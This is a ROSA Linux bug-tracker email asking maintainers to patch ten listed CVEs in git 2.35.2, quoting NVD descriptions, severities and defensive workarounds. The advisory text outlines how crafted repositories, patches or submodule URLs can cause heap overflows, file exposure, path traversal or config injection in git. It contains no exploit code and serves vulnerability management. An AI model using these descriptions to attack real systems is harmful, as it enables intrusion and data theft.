[Bugs] [Bug 13522] New: [CVE 21] git 2.35.2 CVEs found
bugzilla
bugzilla на rosalinux.ru
Ср Авг 23 23:19:25 MSK 2023
https://bugzilla.rosalinux.ru/show_bug.cgi?id=13522
Platform: 2021.1
Bug ID: 13522
Summary: [CVE 21] git 2.35.2 CVEs found
Classification: ROSA-based products
Product: ROSA Fresh
Version: All
Hardware: All
URL: CVE-2022-23521, CVE-2022-29187, CVE-2022-31012,
CVE-2022-39253, CVE-2022-39260, CVE-2022-41903,
CVE-2023-22490, CVE-2023-23946, CVE-2023-25652,
CVE-2023-29007,
OS: Linux
Status: CONFIRMED
Severity: normal
Priority: Normal
Component: System (kernel, glibc, systemd, bash, PAM...)
Assignee: bugs на lists.rosalinux.ru
Reporter: y.tumanov на rosalinux.ru
QA Contact: bugs на lists.rosalinux.ru
CC: e.kosachev на rosalinux.ru, s.matveev на rosalinux.ru,
y.tumanov на rosalinux.ru
Target Milestone: ---
Flags: secteam_verified?
Please patch CVEs for package git version 2.35.2
INFO (CVEs are): git 2.35.2
cves found
CVE-2022-23521
Desc: Git is distributed revision control system. gitattributes are a mechanism
to allow defining attributes for paths. These attributes can be defined by
adding a `.gitattributes` file to the repository, which contains a set of file
patterns and the attributes that should be set for paths matching this pattern.
When parsing gitattributes, multiple integer overflows can occur when there is
a huge number of path patterns, a huge number of attributes for a single
pattern, or when the declared attribute names are huge. These overflows can be
triggered via a crafted `.gitattributes` file that may be part of the commit
history. Git silently splits lines longer than 2KB when parsing gitattributes
from a file, but not when parsing them from the index. Consequentially, the
failure mode depends on whether the file exists in the working tree, the index
or both. This integer overflow can result in arbitrary heap reads and writes,
which may result in remote code execution. The problem has been patched in the
versions published on 2023-01-17, going back to v2.30.7. Users are advised to
upgrade. There are no known workarounds for this issue.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-23521
Severity: CRITICAL
CVE-2022-29187
Desc: Git is a distributed revision control system. Git prior to versions
2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is
vulnerable to privilege escalation in all platforms. An unsuspecting user could
still be affected by the issue reported in CVE-2022-24765, for example when
navigating as root into a shared tmp directory that is owned by them, but where
an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4,
2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The
simplest way to avoid being affected by the exploit described in the example is
to avoid running git as root (or an Administrator in Windows), and if needed to
reduce its use to a minimum. While a generic workaround is not possible, a
system could be hardened from the exploit described in the example by removing
any such repository if it exists already and creating one as root to block any
future attacks.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-29187
Severity: HIGH
CVE-2022-31012
Desc: Git for Windows is a fork of Git that contains Windows-specific patches.
This vulnerability in versions prior to 2.37.1 lets Git for Windows' installer
execute a binary into `C:\mingw64\bin\git.exe` by mistake. This only happens
upon a fresh install, not when upgrading Git for Windows. A patch is included
in version 2.37.1. Two workarounds are available. Create the `C:\mingw64`
folder and remove read/write access from this folder, or disallow arbitrary
authenticated users to create folders in `C:\`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-31012
Severity: HIGH
CVE-2022-39253
Desc: Git is an open source, scalable, distributed revision control system.
Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and
2.37.4 are subject to exposure of sensitive information to a malicious actor.
When performing a local clone (where the source and target of the clone are on
the same volume), Git copies the contents of the source's `$GIT_DIR/objects`
directory into the destination by either creating hardlinks to the source
contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A
malicious actor could convince a victim to clone a repository with a symbolic
link pointing at sensitive information on the victim's machine. This can be
done either by having the victim clone a malicious repository on the same
machine, or having them clone a malicious repository embedded as a bare
repository via a submodule from any source, provided they clone with the
`--recurse-submodules` option. Git does not create symbolic links in the
`$GIT_DIR/objects` directory. The problem has been patched in the versions
published on 2022-10-18, and backported to v2.30.x. Potential workarounds:
Avoid cloning untrusted repositories using the `--local` optimization when on a
shared machine, either by passing the `--no-local` option to `git clone` or
cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning
repositories from untrusted sources with `--recurse-submodules` or run `git
config --global protocol.file.allow user`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-39253
Severity: MEDIUM
CVE-2022-39260
Desc: Git is an open source, scalable, distributed revision control system.
`git shell` is a restricted login shell that can be used to implement Git's
push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4,
2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the
command arguments into an array improperly uses an `int` to represent the
number of entries in the array, allowing a malicious actor to intentionally
overflow the return value, leading to arbitrary heap writes. Because the
resulting array is then passed to `execv()`, it is possible to leverage this
attack to gain remote code execution on a victim machine. Note that a victim
must first allow access to `git shell` as a login shell in order to be
vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5,
2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to
upgrade to the latest version. Disabling `git shell` access via remote logins
is a viable short-term workaround.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-39260
Severity: HIGH
CVE-2022-41903
Desc: Git is distributed revision control system. `git log` can display commits
in an arbitrary format using its `--format` specifiers. This functionality is
also exposed to `git archive` via the `export-subst` gitattribute. When
processing the padding operators, there is a integer overflow in
`pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an
`int`, and then added as an offset to a `memcpy()`. This overflow can be
triggered directly by a user running a command which invokes the commit
formatting machinery (e.g., `git log --format=...`). It may also be triggered
indirectly through git archive via the export-subst mechanism, which expands
format specifiers inside of files within the repository during a git archive.
This integer overflow can result in arbitrary heap writes, which may result in
arbitrary code execution. The problem has been patched in the versions
published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade.
Users who are unable to upgrade should disable `git archive` in untrusted
repositories. If you expose git archive via `git daemon`, disable it by running
`git config --global daemon.uploadArch false`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-41903
Severity: CRITICAL
CVE-2023-22490
Desc: Git is a revision control system. Using a specially-crafted repository,
Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7,
2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone
optimization even when using a non-local transport. Though Git will abort local
clones whose source `$GIT_DIR/objects` directory contains symbolic links, the
`objects` directory itself may still be a symbolic link. These two may be
combined to include arbitrary files based on known paths on the victim's
filesystem within the malicious repository's working copy, allowing for data
exfiltration in a similar manner as CVE-2022-39253. A fix has been prepared and
will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6,
v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds
are available. Avoid cloning repositories from untrusted sources with
`--recurse-submodules`. Instead, consider cloning repositories without
recursively cloning their submodules, and instead run `git submodule update` at
each layer. Before doing so, inspect each new `.gitmodules` file to ensure that
it does not contain suspicious module URLs.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-22490
Severity: MEDIUM
CVE-2023-23946
Desc: Git, a revision control system, is vulnerable to path traversal prior to
versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6,
2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside
the working tree can be overwritten as the user who is running `git apply`. A
fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5,
v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use
`git apply --stat` to inspect a patch before applying; avoid applying one that
creates a symbolic link and then creates a file beyond the symbolic link.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-23946
Severity: HIGH
CVE-2023-25652
Desc: Git is a revision control system. Prior to versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by
feeding specially crafted input to `git apply --reject`, a path outside the
working tree can be overwritten with partially controlled contents
(corresponding to the rejected hunk(s) from the given patch). A fix is
available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6,
2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply`
with `--reject` when applying patches from an untrusted source. Use `git apply
--stat` to inspect a patch before applying; avoid applying one that create a
conflict where a link corresponding to the `*.rej` file exists.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-25652
Severity: HIGH
CVE-2023-29007
Desc: Git is a revision control system. Prior to versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a
specially crafted `.gitmodules` file with submodule URLs that are longer than
1024 characters can used to exploit a bug in
`config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used
to inject arbitrary configuration into a user's `$GIT_DIR/config` when
attempting to remove the configuration section associated with that submodule.
When the attacker injects configuration values which specify executables to run
(such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to
a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As
a workaround, avoid running `git submodule deinit` on untrusted repositories or
without prior inspection of any submodule sections in `$GIT_DIR/config`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-29007
Severity: HIGH
--
You are receiving this mail because:
You are the QA Contact for the bug.
You are the assignee for the bug.
----------- следущая часть -----------
Вложение в формате HTML было извлечено…
URL: <http://lists.rosalinux.ru/pipermail/bugs/attachments/20230823/9f958702/attachment.html>
Подробная информация о списке рассылки Bugs